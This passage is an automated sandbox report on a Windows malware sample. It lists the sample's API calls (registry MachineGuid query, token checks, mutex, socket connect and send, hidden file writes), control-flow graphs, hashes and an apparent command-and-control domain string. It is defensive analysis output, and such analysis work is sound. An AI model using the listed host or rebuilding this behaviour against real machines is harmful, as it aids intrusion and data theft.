                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: recv
                                    • String ID:
                                    • API String ID: 1507349165-0
                                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 232 406201-406203 229->232 233 406208-406228 call 4060ac call 4031e5 229->233 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 232->235 233->230 233->232 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 260 406311-406317 call 402bab 257->260 261 406318-40631e 257->261 260->261 265 406320-406326 call 402bab 261->265 266 406327 261->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062df call 4031e5 262->273 263->257 265->266 266->235 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                    • _wmemset.LIBCMT ref: 00406244
                                    • _wmemset.LIBCMT ref: 00406261
                                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wmemset$ErrorInformationLastToken
                                    • String ID: IDA$IDA
                                    • API String ID: 487585393-2020647798
                                    • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                    • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 551 404ec7-404ec9 542->551 544 404eb3-404ebe freeaddrinfo 543->544 545 404ea9-404eb1 call 404de5 543->545 548 404ec0-404ec6 call 402bab 544->548 549 404ecb 544->549 545->544 548->551 554 404ecd-404ece 549->554 551->554 554->539
                                    APIs
                                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                    • socket.WS2_32(?,?,?), ref: 00404E7A
                                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: freeaddrinfogetaddrinfosocket
                                    • String ID:
                                    • API String ID: 2479546573-0
                                    • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                    • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 561 404192-4041a7 call 403c90 560->561 562 404184 560->562 561->562 569 4041a9-4041b8 call 403c59 561->569 564 404186-40418c 562->564 579 4041ba-4041d8 call 4040bb call 403d44 569->579 580 4041db-4041e4 call 402bab 569->580 570->571 574 40411b-404120 570->574 573 40417d-40417e call 403c40 571->573 581 404183 573->581 577 404122 574->577 578 404124-404140 call 4031e5 VirtualAlloc 574->578 577->578 578->571 588 404142-40415e call 4031e5 ReadFile 578->588 579->580 580->564 581->562 588->573 593 404160-404178 call 4031e5 588->593 593->573
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AllocCreateReadVirtual
                                    • String ID: .tmp
                                    • API String ID: 3585551309-2986845003
                                    • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                    • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                    APIs
                                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                    • GetLastError.KERNEL32 ref: 0041399E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Error$CreateLastModeMutex
                                    • String ID:
                                    • API String ID: 3448925889-0
                                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreatePointerWrite
                                    • String ID:
                                    • API String ID: 3672724799-0
                                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                      • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$CreateFreeProcessThread_wmemset
                                    • String ID: ckav.ru
                                    • API String ID: 2915393847-2696028687
                                    • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                    • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                    APIs
                                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                    • _wmemset.LIBCMT ref: 0040634F
                                      • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser_wmemset
                                    • String ID: CA
                                    • API String ID: 2078537776-1052703068
                                    • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                    • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                    APIs
                                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InformationToken
                                    • String ID: IDA
                                    • API String ID: 4114910276-365204570
                                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                    APIs
                                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc
                                    • String ID: s1@
                                    • API String ID: 190572456-427247929
                                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                    APIs
                                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 1425999871-0
                                    • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                    • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                    APIs
                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CheckMembershipToken
                                    • String ID:
                                    • API String ID: 1351025785-0
                                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                    APIs
                                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateDirectory
                                    • String ID:
                                    • API String ID: 4241100979-0
                                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                    APIs
                                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoNativeSystem
                                    • String ID:
                                    • API String ID: 1721193555-0
                                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                    APIs
                                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: send
                                    • String ID:
                                    • API String ID: 2809346765-0
                                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                    APIs
                                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileMove
                                    • String ID:
                                    • API String ID: 3562171763-0
                                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                    APIs
                                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startup
                                    • String ID:
                                    • API String ID: 724789610-0
                                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                    APIs
                                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
